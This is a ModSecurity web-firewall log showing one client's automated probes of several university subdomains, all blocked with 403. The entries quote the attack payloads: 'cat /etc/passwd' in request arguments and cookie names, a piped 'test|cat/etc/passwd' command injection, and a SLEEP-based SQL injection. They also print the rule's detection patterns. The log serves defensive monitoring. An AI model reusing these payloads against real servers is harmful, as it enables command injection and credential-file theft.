[Tue Aug 29 11:33:34.355224 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARt-@4AAAAV"]
[Tue Aug 29 11:33:35.322702 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAAR@KF0AAAAF"]
[Tue Aug 29 11:33:35.323445 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARnmKEAAAAR"]
[Tue Aug 29 11:33:35.327916 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASBXQMAAAAM"]
[Tue Aug 29 11:33:35.329656 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARQ3-MAAAAB"]
[Tue Aug 29 11:33:35.331631 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARLXy4AAAAQ"]
[Tue Aug 29 11:33:35.369744 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARQ3-UAAAAB"]
[Tue Aug 29 11:33:35.371545 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARo80UAAAAT"]
[Tue Aug 29 11:33:35.378927 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARA7hoAAAAA"]
[Tue Aug 29 11:33:35.379524 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARNlAAAAAAS"]
[Tue Aug 29 11:33:35.379845 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAAQKOm4AAAAs"]
[Tue Aug 29 11:33:35.393077 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAAOJKewAAAAE"]
[Tue Aug 29 11:33:35.399733 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAAQKOm8AAAAs"]
[Tue Aug 29 11:33:35.404839 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARNlAEAAAAS"]
[Tue Aug 29 11:33:35.406874 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAASBXQcAAAAM"]
[Tue Aug 29 11:33:35.412587 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARQ3-cAAAAB"]
[Tue Aug 29 11:33:36.328657 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARNlAIAAAAS"]
[Tue Aug 29 11:33:36.329489 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAASAHacAAAAH"]
[Tue Aug 29 11:33:36.330982 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARA7hwAAAAA"]
[Tue Aug 29 11:33:36.332456 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARy-vsAAAAb"]
[Tue Aug 29 11:33:36.333513 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAANsAh4AAAAD"]
[Tue Aug 29 11:33:36.334635 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARt--IAAAAV"]
[Tue Aug 29 11:33:36.336997 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARLXzIAAAAQ"]
[Tue Aug 29 11:33:36.352270 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARy-vwAAAAb"]
[Tue Aug 29 11:33:36.372581 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARNlAQAAAAS"]
[Tue Aug 29 11:33:36.393485 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARNlAUAAAAS"]
[Tue Aug 29 11:33:36.451026 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11IMCo-f0AAARy-v4AAAAb"]
[Tue Aug 29 11:33:37.313279 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAANsAiEAAAAD"]
[Tue Aug 29 11:33:37.323297 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASBXQ0AAAAM"]
